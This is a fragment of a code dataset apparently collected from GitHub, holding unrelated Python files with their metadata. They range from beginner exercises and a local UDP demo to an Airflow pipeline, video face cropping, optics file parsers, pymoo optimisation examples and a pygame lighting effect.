randint(1, 10)\n\nwhile not guessed:\n str_num = input(\"Give me Your number:\")\n\n try:\n num = int(str_num)\n except ValueError:\n print(\"Number please!\")\n continue\n\n if num not in range(1, 11):\n print(\"number is between 1 and 10\")\n\n if num == rnd:\n print(\"You got it!\")\n guessed = True\n else:\n print(\"Try again\")\n\n\n\n\"\"\"\nExercise 6\nWrite a 'random average\" function that will get 'n' random numbers in range 1 - 100, sum them, and return average.\n\"\"\"\n\n\ndef random_average(n):\n sum = 0\n num = 0\n for i in range(0, n):\n sum += randint(1, 100)\n num += 1\n return sum / num\n\n\n#print(\"6#\", random_average(10))\n\n\"\"\"\nExercise 7\nWrite program, that will ask user to write 2 numbers, divise those numbers, and print final result.\nAlso secure Your code from possible errors.\n\"\"\"\n\ndef division_check():\n\n a = input(\"Enter number a: \")\n b = input(\"Enter number b: \")\n\n try:\n x = int(a)\n y = int(b)\n\n except ValueError:\n print(\"You need to put a number\")\n\n except ZeroDivisionError:\n print(\"You can't divise by zero\")\n\n return x / y\n\n\n#print(\"7#\", division_check())\n\n\n\"\"\"\nExercise 8\nWrite a function that will check validation of PESEL number. Function will take string as a value and return \nboolean value. PESEL contains 11 numbers. Last number is a control number. First 10 numbers should be multiple by\nfollowing numbers: `1 3 7 9 1 3 7 9 1 3`. Those numbers should be summed, then divided by 10 and finally minus\n10. If number You get will be equal to control number PESEL number is correct.\n\"\"\"\n\n\ndef validate_pesel(data):\n pesel = [int(i) for i in str(data)]\n wage = [1, 3, 7, 9, 1, 3, 7, 9, 1, 3]\n new_list = [pesel[i] * wage[i] for i in range(len(pesel) - 1)]\n\n result = 10 - (sum(new_list) % 10)\n\n if result == pesel[-1]:\n return True\n\n else:\n return False\n\n\nprint(\"8#\", validate_pesel(88042512499))\n", "repo_name": "PanMartinez/Bootcamp_Repeat", "sub_path": "01Basics/03env_and_imports.py", "file_name": "03env_and_imports.py", "file_ext": "py", "file_size_in_byte": 3917, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 85, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 117, "usage_type": "call"}]} +{"seq_id": "3673946895", "text": "import socket\nimport logging\nimport time \nimport multiprocessing\nimport struct\nfrom typing import NamedTuple\n# https://www.pythonpool.com/struct-pack/\n# https://zetcode.com/python/namedtuple/\n\nlogging.basicConfig(format=\"[%(levelname)s] %(asctime)s %(message)s\", level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\nclass MyData(NamedTuple):\n id: int\n age: bytes\n # name: str\n\n\n\ndef server():\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n server_socket.bind(('', 12000))\n\n while True:\n message, address = server_socket.recvfrom(1024)\n data = struct.unpack(\"IB\", message)\n data = MyData(*data)\n log.debug(f\"id: {data.id} age:{data.age}\")\n server_socket.sendto(b\"ack\", address)\n\n\ndef client():\n for pings in range(10):\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n client_socket.settimeout(1.0)\n data = MyData(pings, pings)\n data = struct.pack('IB', *data)\n \n message = data\n addr = (\"127.0.0.1\", 12000)\n\n start = time.time()\n client_socket.sendto(message, addr)\n try:\n data, server = client_socket.recvfrom(1024)\n end = time.time()\n elapsed = end - start\n log.debug(f'{data} {pings} {elapsed}')\n except socket.timeout:\n log.error('REQUEST TIMED OUT')\n \n\n \nif __name__ == \"__main__\":\n p_server = multiprocessing.Process(target=server)\n p_client = multiprocessing.Process(target=client)\n p_server.start()\n p_client.start()\n p_server.join()\n p_client.join()\n", "repo_name": "robobe/robobe.github.io", "sub_path": "examples/python/networking/udp/client_server.py", "file_name": "client_server.py", "file_ext": "py", "file_size_in_byte": 1611, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 10, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 11, "usage_type": "call"}, {"api_name": "typing.NamedTuple", "line_number": 13, "usage_type": "name"}, {"api_name": "socket.socket", "line_number": 21, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 21, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 21, "usage_type": "attribute"}, {"api_name": "struct.unpack", "line_number": 26, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 34, "usage_type": "call"}, {"api_name": "socket.AF_INET", "line_number": 34, "usage_type": "attribute"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 34, "usage_type": "attribute"}, {"api_name": "struct.pack", "line_number": 37, "usage_type": "call"}, {"api_name": "time.time", "line_number": 42, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "socket.timeout", "line_number": 49, "usage_type": "attribute"}, {"api_name": "multiprocessing.Process", "line_number": 55, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "7514812225", "text": "from utils.spark import SparkDefaults\nfrom operators.LoadOperator import LoadDShopOperator\nimport pathlib\nfrom datetime import datetime\n\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom operators.ExtractTableOperator import ExtractPGTable2HDFSOperator\nfrom operators.TransformTableOperator import TransformTableOperator\nfrom utils.creds import Credentials\n\n\n# Path to the directory where the out-of-stock data has to be stored/cached in json\nDATA_PATH_OOS_BRONZE = pathlib.Path(\"/bronze/dshop\")\n\n# Path to the directory where the out-of-stock data has to be stored/cached in parquet\nDATA_PATH_OOS_SILVER = pathlib.Path(\"/silver/dshop\")\n\nDEFAULT_ARGS = {\n 'owner': 'airflow'\n , 'email': ['airflow@airflow.com']\n , 'email_on_failure': False\n , 'retries': 2\n}\n\ndag = DAG(\n dag_id='dshop_dag_0_1_0'\n , description='Load data from `dshop` database to Bronze, clear and verify then put into the Silver. After all, load data to Gold Greenplum database.'\n , schedule_interval='@daily'\n , start_date=datetime(2021, 6, 2, 5) # <- load data each morning at 5 a.m.\n , default_args=DEFAULT_ARGS\n)\n\nextract_tasks = []\ntransform_tasks = []\ntable_names = [\n \"orders\", \"products\", \"departments\", \"aisles\"\n , \"clients\", \"stores\", \"store_types\", \"location_areas\"\n]\nwith dag:\n for table_name in table_names:\n extract_task = ExtractPGTable2HDFSOperator(\n task_id=f\"extract_dshop_bronze_{table_name}\"\n , provide_context=True\n , hdfs_conn_id=Credentials.DEFAULT_HDFS_CONN_ID\n , table_name=table_name\n , data_directory=DATA_PATH_OOS_BRONZE\n , db_conn_id=Credentials.DEFAULT_DB_CONN_ID\n )\n extract_tasks.append(extract_task)\n\n transform_task = TransformTableOperator(\n task_id=f\"transform_dshop_silver_{table_name}\"\n , provide_context=True\n , src_file_ext=\"csv\"\n , dst_file_ext=\"parquet\"\n , src_file_name=table_name\n , dst_file_name=table_name\n , hdfs_conn_id=Credentials.DEFAULT_HDFS_CONN_ID\n , src_path=DATA_PATH_OOS_BRONZE\n , dst_path=DATA_PATH_OOS_SILVER\n , spark_master=\"local\"\n , spark_app_name=\"transform_dshop_app\"\n )\n transform_tasks.append(transform_task)\n\n wait_extract_task = DummyOperator(\n task_id=\"wait_dshop_extraction_step\"\n )\n\n wait_transform_task = DummyOperator(\n task_id=\"wait_dshop_transform_step\"\n )\n\n load_task = LoadDShopOperator(\n task_id=\"load_dshop_gold\"\n , provide_context=True\n , dst_db_conn_id = Credentials.DEFAULT_CONN_GOLD_DB_ID\n , jdbc_driver_path = SparkDefaults.DEFAULT_SPARK_JDBC_DRIVER_PATH\n , src_path=DATA_PATH_OOS_SILVER\n , spark_master=\"local\"\n , spark_app_name=\"load_dshop_app\"\n )\n\nfor extract_task, transform_task in zip(extract_tasks, transform_tasks):\n extract_task >> wait_extract_task >> transform_task >> wait_transform_task >> load_task\n", "repo_name": "IevgenV/edu-robots-dataeng-project", "sub_path": "dags/dshop_dag.py", "file_name": "dshop_dag.py", "file_ext": "py", "file_size_in_byte": 3099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "airflow.DAG", "line_number": 26, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "operators.ExtractTableOperator.ExtractPGTable2HDFSOperator", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.creds.Credentials.DEFAULT_HDFS_CONN_ID", "line_number": 45, "usage_type": "attribute"}, {"api_name": "utils.creds.Credentials", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.creds.Credentials.DEFAULT_DB_CONN_ID", "line_number": 48, "usage_type": "attribute"}, {"api_name": "utils.creds.Credentials", "line_number": 48, "usage_type": "name"}, {"api_name": "operators.TransformTableOperator.TransformTableOperator", "line_number": 52, "usage_type": "call"}, {"api_name": "utils.creds.Credentials.DEFAULT_HDFS_CONN_ID", "line_number": 59, "usage_type": "attribute"}, {"api_name": "utils.creds.Credentials", "line_number": 59, "usage_type": "name"}, {"api_name": "airflow.operators.dummy_operator.DummyOperator", "line_number": 67, "usage_type": "call"}, {"api_name": "airflow.operators.dummy_operator.DummyOperator", "line_number": 71, "usage_type": "call"}, {"api_name": "operators.LoadOperator.LoadDShopOperator", "line_number": 75, "usage_type": "call"}, {"api_name": "utils.creds.Credentials.DEFAULT_CONN_GOLD_DB_ID", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.creds.Credentials", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.spark.SparkDefaults.DEFAULT_SPARK_JDBC_DRIVER_PATH", "line_number": 79, "usage_type": "attribute"}, {"api_name": "utils.spark.SparkDefaults", "line_number": 79, "usage_type": "name"}]} +{"seq_id": "9166113", "text": "from detector import Detector, draw_boxes, count_file\nimport os\nimport cv2\n\nVIDEO_FOLDER_DIR = \"data/video/\"\nOUTPUT_FOLDER_DIR = \"/home/huycn/Documents/School/Python/data/cut_face/video_face/\"\n\ndef cut_images(img, boxes, path, name):\n name = name.split(\".\")[0]\n if type(boxes) == type(None):\n print(\"don't have any box to draw\")\n else:\n a = 0\n for box in boxes:\n box = [int(i) for i in box]\n [x1, y1, x2, y2] = box\n\n cut_img = img[y1:y2, x1:x2]\n\n img_dir = '{}/{}.{}.jpg'.format(OUTPUT_FOLDER_DIR, name, a)\n print(\"imwrite\", img_dir)\n\n \n os.makedirs(os.path.dirname(path), exist_ok=True)\n cv2.imwrite(img_dir, cut_img)\n a += 1\n\ndef main():\n list_video_dir = os.listdir(VIDEO_FOLDER_DIR)\n if len(list_video_dir) == 0:\n print(\"dont have any video in this dir\")\n return\n\n \n model = Detector('tinyface')\n for name in list_video_dir:\n video_dir = VIDEO_FOLDER_DIR + name\n print(video_dir)\n cap = cv2.VideoCapture(video_dir)\n i = 0\n while True:\n _, frame = cap.read()\n if i % 60 == 0:\n boxes, scores = model.detect(frame)\n \n cut_images(frame, boxes, OUTPUT_FOLDER_DIR + name.split('.')[0], str(i))\n i += 1\nif __name__ == \"__main__\":\n main() ", "repo_name": "Chau-Ngoc-Huy/crawl_data", "sub_path": "detect_face_video/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1414, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.makedirs", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 25, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 29, "usage_type": "call"}, {"api_name": "detector.Detector", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "19426530296", "text": "from traits.api import *\nfrom traitsui.api import *\nimport numpy as np\nfrom basic_material import BasicMaterial\nfrom converter import SpectralConverter\nimport scipy.interpolate as scinterp\nimport os\nimport logging\nfrom pame.utils import complex_n_to_e\n\nclass MaterialFileError(Exception):\n \"\"\" \"\"\"\n\nclass ABCExternal(BasicMaterial):\n \"\"\" Base class for files and database linking (ie external) \"\"\"\n # These are all displayed on Adapter View (Original x values of file)\n xstart = Property(Float)\n xend = Property(Float)\n xpoints = Property(Int)\n file_spec_unit = Str() \n\n interpolation = Enum('linear',\n 'nearest', \n 'zero',\n 'slinear',\n 'quadratic', \n 'cubic')\n\n # Store the real data in the file; should be visualized on mview later\n file_x = Array() \n file_n = CArray() #Complex array nr, ni \n file_e = Property(CArray, depends_on='file_n')\n xps_in_nm = Array() #<-- x values in file in nanometers\n \n def _get_file_e(self):\n return complex_n_to_e(self.file_n)\n\n def _get_xstart(self):\n return self.file_x[0]\n \n def _get_xend(self):\n return self.file_x[-1]\n \n def _get_xpoints(self):\n return len(self.file_x)\n \n def _lambdas_changed(self):\n #update data only re-reads file, so don't need udpate_data()\n self.update_interp() \n \n def _interpolation_changed(self):\n self.update_interp()\n\n def _extrapolation_changed(self):\n self.update_interp()\n\n def update_interp(self):\n \"\"\"Interpolates complex arrays from file data and sets self.narray (real and imaginary),\n could also set dielectric function, since BasicMaterial updates when either is changed.\"\"\"\n nps = self.file_n\n xps = np.copy(self.xps_in_nm)\n \n # xps is always nm, so if goes large, small, reverse N's\n if xps[0] > xps[-1]:\n nps=nps[::-1] \n xps=xps[::-1] #Syntax to reverse an array \n\n # Spline interpolation. \n f = scinterp.interp1d(xps, nps, kind=self.interpolation, bounds_error=False) \n narray = f(self.lambdas)\n \n if self.extrapolation:\n #Only extrapolate if there are Nans. Mask by dropping Nans\n #And passing full x, dropped x and narray. Can't be complex,\n #even though spline interp can be...\n # http://docs.scipy.org/doc/numpy/reference/generated/numpy.interp.html \n if np.isnan(self.narray).any():\n xmask = self.lambdas[np.logical_not(np.isnan(narray))]\n nmask = narray[np.logical_not(np.isnan(narray))]\n n = np.interp(self.lambdas, xmask, nmask.real)#, left=0, right=0)\n k = np.interp(self.lambdas, xmask, nmask.imag)#, left=0, right=0)\n narray = n + 1j*k\n\n self.narray = narray\n\n def _xps_in_nm_default(self):\n \"\"\" Store file datapoints in nm (only need once assuming Nanometer\n unit system is used internally in PAME\n \"\"\"\n conv = SpectralConverter(input_array=self.file_x,\n input_units=self.file_spec_unit,\n output_units='Nanometers') \n return conv.output_array\n\n def update_data(self):\n \"\"\" Must set header, set file_x, set file_n and call updated_interp() \"\"\"\n pass\n \n\nclass ABCFile(ABCExternal):\n \"\"\" General model to store data from file. \n \n Notes\n -----\n In update_data(), readas file, sets header, sets n arrays, also stores original \n file wavelengths and other metdata.\n \n Metadata includes file id, \n name, header. 'file_path' must be set on instantiation!! \n \n Check out file Adapter for how files are stored without storing all their data.\n (basic_materials_adapter.ABCFileAdapter)\n \"\"\"\n \n source = 'File'\n file_path = File() \n short_name = Property(depends_on='file_path')\n file_id = Str() #Used to identify with methods below. For example, Sopra is \"Sopra\"\n file_extention = Str() #Again, not all files may have this\n header = Str() \n \n delimiter = None #If not none, will split on a certain character. Used for csv file\n #Otherwise, default split()/genfromtxt will split on all whitespace\n \n def _file_path_changed(self):\n \"\"\" THIS HANDLES MAIN EVENT! \n 1. Read file Data \n 3. Interpolate\n \"\"\"\n self.update_data()\n self.update_interp() \n \n #def _file_spec_unit_changed(self):\n #raise MaterialFileError('Design choice to disallow changing of file_spec_unit')\n ## This shouldn't happen\n ## self.update_interp()\n \n def _get_short_name(self):\n return os.path.basename(self.file_path)\n \n def update_data(self):\n \"\"\" Must set header, set file_x, set file_n and call updated_interp() \"\"\"\n pass\n \n\nclass XNKFile(ABCFile):\n \"\"\"3-coloumns header: lambdas, N, K as arrays.\"\"\"\n fileid='xnk'\n delimiter = None\n # file_extension='.txt' #not used/clear\n\n def update_data(self):\n \"\"\" File must have a header of from (specunit, N, K). From header, \n specunit is set. N and K are read into arrays. \n \"\"\"\n with open(self.file_path, 'r') as f:\n self.header = f.readline().lstrip('#').strip()\n \n \n try:\n self.file_x, n, k = np.genfromtxt(self.file_path, \n unpack=True, \n skip_header=1,\n delimiter=self.delimiter)\n except Exception as exc:\n raise MaterialFileError(r'Could not read %s with np.genfromtxt'\n ' Make sure it is three column, with single header of form'\n ' (specunit, N, K). TracebacK:\\n\\n%s' %\n (self.short_name, exc) )\n \n \n else: \n self.file_n = n + 1j*k\n\n # Set default unit from header[0]\n self.file_spec_unit = self.header.split(self.delimiter)[0]\n\n\n traits_view=View(Item('header', style='readonly'),\n Item('mviewbutton', show_label=False, label='Show Material'),\n Item('file_path', style='readonly') )\n \n\nclass XNKFileCSV(XNKFile):\n \"\"\" Wavelength, N, K delimited, 3-column file but comma-separated.\"\"\"\n fileid='xnk_csv'\n delimiter = ','\n file_extension='.csv' \n \n\nclass SopraFile(ABCFile): \n\n file_id='Sopra'\n file_extension='.nk'\n\n traits_view=View( \n Item('mviewbutton', label='Show Material', show_label=False),\n Item('file_path', editor=FileEditor() ) ,\n Item('header' ),\n HGroup(\n Item('xstart', style='readonly') ,\n Item('xend', style='readonly'),\n Item('xpoints', style='readonly'),\n ),\n Item('file_spec_unit', label='File spectral unit', style='readonly'), \n Item('x_unit', style='readonly', label='Current spectral unit'),\n resizable=True, buttons=['Undo']\n )\n\n\n def update_data(self):\n\n with open(self.file_path, 'r') as f:\n self.header = f.readline().lstrip('#').strip() \n \n # Parse SOPRA header (ALLOW FOR COMMA OR MATDELIM cuz comma is common) \n headerlist = self.header.split(self.delimiter)\n\n code = int(headerlist[0])\n xstart = float(headerlist[1])\n xend = float(headerlist[2])\n xpoints = int(headerlist[3])\n\n self.file_x = np.linspace(xstart, xend, xpoints+1) #<< +1?\n\n # Set specunit ...\n if code==1:\n self.file_spec_unit='eV'\n \n elif code==2:\n self.file_spec_unit='Micrometers'\n\n elif code==3:\n self.file_spec_unit='cm-1' #Inverse centimeters\t\n\n elif code==4:\n self.file_spec_unit='Nanometers'\n else:\n raise MaterialFileError('Sopra specunit code must be 1,2,3 or 4. Got: %s' % code)\n\n # Populate arrays (2 column)\n n, k = np.genfromtxt(self.file_path, \n unpack=True,\n skip_header=1)\n \n self.file_n = n + 1j*k\n", "repo_name": "hughesadam87/PAME", "sub_path": "pame/material_files.py", "file_name": "material_files.py", "file_ext": "py", "file_size_in_byte": 8432, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "53", "api": [{"api_name": "basic_material.BasicMaterial", "line_number": 14, "usage_type": "name"}, {"api_name": "pame.utils.complex_n_to_e", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 61, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 69, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.isnan", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 81, "usage_type": "call"}, {"api_name": "converter.SpectralConverter", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.genfromtxt", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.genfromtxt", "line_number": 242, "usage_type": "call"}]} +{"seq_id": "73954657128", "text": "# Test matrix file - load in the matrix jsons and send a request to \n# the matrix adder\nimport json\nimport requests\n\ndef test_matrix_multiplier():\n\n # import the matrix files\n with open(\"test/matrix_a.json\") as f:\n matrix_a = json.load(f)\n with open(\"test/matrix_b.json\") as f:\n matrix_b = json.load(f)\n\n # set up the request\n j_request = []\n j_request.append(matrix_a)\n j_request.append(matrix_b)\n \n # send matrixes\n r = requests.get('http://127.0.0.1:8072/multi', data=json.dumps(j_request))\n \n # assert the response\n print(f\"The response is {r.text}\")\n assert(r.status_code == 200)\n assert(int(r.text) == 96)", "repo_name": "baviddak/go-matrix", "sub_path": "test/test_matrix.py", "file_name": "test_matrix.py", "file_ext": "py", "file_size_in_byte": 670, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 10, "usage_type": "call"}, {"api_name": "json.load", "line_number": 12, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 20, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "9354710350", "text": "# START ctaea\nfrom pymoo.algorithms.ctaea import CTAEA\nfrom pymoo.factory import get_problem, get_reference_directions\nfrom pymoo.optimize import minimize\nfrom pymoo.visualization.scatter import Scatter\n\nproblem = get_problem(\"DASCMOP1\", 2)\n\n# create the reference directions to be used for the optimization\nref_dirs = get_reference_directions(\"das-dennis\", problem.n_obj, n_points=91)\n\n# create the algorithm object\nalgorithm = CTAEA(ref_dirs=ref_dirs)\n\n# execute the optimization\nres = minimize(problem,\n algorithm,\n ('n_gen', 600),\n seed=1,\n verbose=True\n )\n\nplot = Scatter()\nplot.add(problem.pareto_front(), plot_type=\"line\", color=\"black\", alpha=0.7)\nplot.add(res.F, color=\"red\")\nplot.show()\n# END ctaea\n\n# START carside\nproblem = get_problem(\"carside\")\nref_dirs = get_reference_directions(\"das-dennis\", problem.n_obj, n_points=91)\nalgorithm = CTAEA(ref_dirs=ref_dirs)\n\nres = minimize(problem,\n algorithm,\n ('n_gen', 600),\n seed=1,\n verbose=True\n )\n\nScatter().add(res.F).show()\n# END carside\n", "repo_name": "AIasd/ADFuzz", "sub_path": "pymoo/pymoo/usage/algorithms/usage_ctaea.py", "file_name": "usage_ctaea.py", "file_ext": "py", "file_size_in_byte": 1137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymoo.factory.get_problem", "line_number": 7, "usage_type": "call"}, {"api_name": "pymoo.factory.get_reference_directions", "line_number": 10, "usage_type": "call"}, {"api_name": "pymoo.algorithms.ctaea.CTAEA", "line_number": 13, "usage_type": "call"}, {"api_name": "pymoo.optimize.minimize", "line_number": 16, "usage_type": "call"}, {"api_name": "pymoo.visualization.scatter.Scatter", "line_number": 23, "usage_type": "call"}, {"api_name": "pymoo.factory.get_problem", "line_number": 30, "usage_type": "call"}, {"api_name": "pymoo.factory.get_reference_directions", "line_number": 31, "usage_type": "call"}, {"api_name": "pymoo.algorithms.ctaea.CTAEA", "line_number": 32, "usage_type": "call"}, {"api_name": "pymoo.optimize.minimize", "line_number": 34, "usage_type": "call"}, {"api_name": "pymoo.visualization.scatter.Scatter", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "13080379178", "text": "#%%\nimport json\nimport pandas as pd\nimport os\nimport glob\nfrom subprocess import call\n\ndef load_labels(label_csv_path):\n data = pd.read_csv(label_csv_path, delimiter=' ', header=None)\n labels = []\n for i in range(data.shape[0]):\n labels.append(data.ix[i, 1])\n return labels\n\n\ndef convert_csv_to_dict(csv_path, subset, labels):\n try:\n data = pd.read_csv(csv_path, delimiter=' ', header=None)\n except pd.errors.EmptyDataError:\n return {}\n\n keys = []\n key_labels = []\n for i in range(data.shape[0]):\n row = data.ix[i, :]\n class_name = labels[row[1] - 1]\n basename = str(row[0])\n \n keys.append(basename)\n key_labels.append(class_name)\n \n database = {}\n for i in range(len(keys)):\n key = keys[i]\n database[key] = {}\n database[key]['subset'] = subset\n label = key_labels[i]\n database[key]['annotations'] = {'label': label}\n \n return database\n\ndef convert_jester_csv_to_activitynet_json(label_csv_path, train_csv_path, test_csv_path, dst_json_path):\n labels = load_labels(label_csv_path)\n if train_csv_path:\n train_database = convert_csv_to_dict(train_csv_path, 'training', labels)\n else:\n train_database = {}\n test_database = convert_csv_to_dict(test_csv_path, 'testing', labels)\n \n dst_data = {}\n dst_data['labels'] = labels\n dst_data['database'] = {}\n dst_data['database'].update(train_database)\n dst_data['database'].update(test_database)\n\n with open(dst_json_path, 'w') as dst_file:\n json.dump(dst_data, dst_file)\n\n#%%\ndef prepare_json(csv_dir_path='./annotation_ems', expr_name='15.3'):\n \"\"\" Convert training & testing list into a single json file.\n\n Parameters\n ----------\n csv_dir_path: the path to training/testing list; the output json file will also be saved into the same directory.\n expr_name: expriment name.\n \"\"\"\n label_csv_path = os.path.join(csv_dir_path, 'classInd%s.txt' % expr_name)\n train_csv_path = os.path.join(csv_dir_path, 'trainlist%s.txt' % expr_name)\n test_csv_path = os.path.join(csv_dir_path, 'testlist%s.txt' % expr_name)\n dst_json_path = os.path.join(csv_dir_path, 'ems%s.json' % expr_name)\n\n convert_jester_csv_to_activitynet_json(\n label_csv_path, train_csv_path, test_csv_path, dst_json_path)\n\ndef split(video_path, annot_path, fps=30, delay=4/30, duration=10/30):\n \"\"\" Split a single video file into multiple clips based on annotation.\n\n Parameters\n ----------\n fps: frame rate\n delay: how many seconds it take for bootstrap\n duration: the length for each clip, in second(s)\n\n \"\"\"\n directory = video_path.split(\".\")[0] + \"_all\"\n if not os.path.exists(directory):\n os.makedirs(directory)\n call([\"ffmpeg\", \"-i\", video_path, os.path.join(directory, \"%05d.jpg\"), \"-hide_banner\"])\n\n with open(annot_path, 'r') as f:\n annot = f.readlines()\n\n annot = [a for a in annot[0::2]]\n ges_cnt = {}\n\n for j, a in enumerate(annot[:]):\n ges = a.split('start')[0]\n ges = '_'.join(ges.lower().strip().split(' '))\n # ges = 'human_' + ges\n\n t = a.split('start:')[-1].strip()\n t = float(t)\n\n start = int((t + delay) * fps)\n end = int((t + delay + duration) * fps)\n\n cnt = ges_cnt.get(ges, 0) + 1\n ges_cnt[ges] = cnt\n output_dir = os.path.join(video_path.split('/'), '{:03d}_{}_{:02d}_all'.format(j, ges, cnt))\n os.makedirs(output_dir, exist_ok=True)\n for i in range(start, end):\n os.system('cp {}/{:05d}.jpg {}'.format(directory, i, output_dir))\n\n d = sorted(glob.glob('%s/*' % output_dir))\n\n for i in range(len(d)):\n f = '%05d.jpg' % (i+1)\n d2 = output_dir + '/' + f\n os.system('mv %s %s' % (d[i], d2))", "repo_name": "0x10cxR1/Real-time-GesRec", "sub_path": "ems_prepare.py", "file_name": "ems_prepare.py", "file_ext": "py", "file_size_in_byte": 3870, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 9, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.errors", "line_number": 19, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 88, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 111, "usage_type": "call"}, {"api_name": "os.system", "line_number": 113, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 115, "usage_type": "call"}, {"api_name": "os.system", "line_number": 120, "usage_type": "call"}]} +{"seq_id": "37973340546", "text": "\"\"\"Inspired by FluffyPotatoe's example on youtube, but improved blurry lights\"\"\"\n#tags: light, fx, light emitter, light emission, lighting, emit light, particle, particles, oscillating light, oscillating, generate_oscillating_lights, image\n\n\nimport pygame, random\nimport thorpy as tp\nfrom thorpy.graphics import generate_oscillating_lights as gen_lights\n\npygame.init()\nW, H = 800,600\nscreen = pygame.display.set_mode((W, H))\n\n#load some background pic for testing\nbck = pygame.image.load(tp.fn(\"data/bck.jpg\")) \nbck = pygame.transform.smoothscale(bck, (W,H))\n\n#particles parameters\nMAX_RADIUS = 10\nRADIUS_FACTOR = 2\nRADIUS_DECAY = MAX_RADIUS / 200\nLIGHT_COLOR = (20, 20, 60)\nN = RADIUS_FACTOR*MAX_RADIUS\n\n\ndef circle_transp_bck(radius, color):\n surf = pygame.Surface((radius * 2, radius * 2))\n pygame.draw.circle(surf, color, (radius, radius), radius)\n surf.set_colorkey((0, 0, 0))\n return surf\n\ndef draw_light_particle(particle):\n pygame.draw.circle(screen,\n (255, 255, 255),\n [int(particle[0][0]), int(particle[0][1])],\n int(particle[2]))\n radius = particle[2] * RADIUS_FACTOR\n \n c = circle_transp_bck(radius, LIGHT_COLOR)\n r = c.get_rect()\n r.center = particle[0]\n 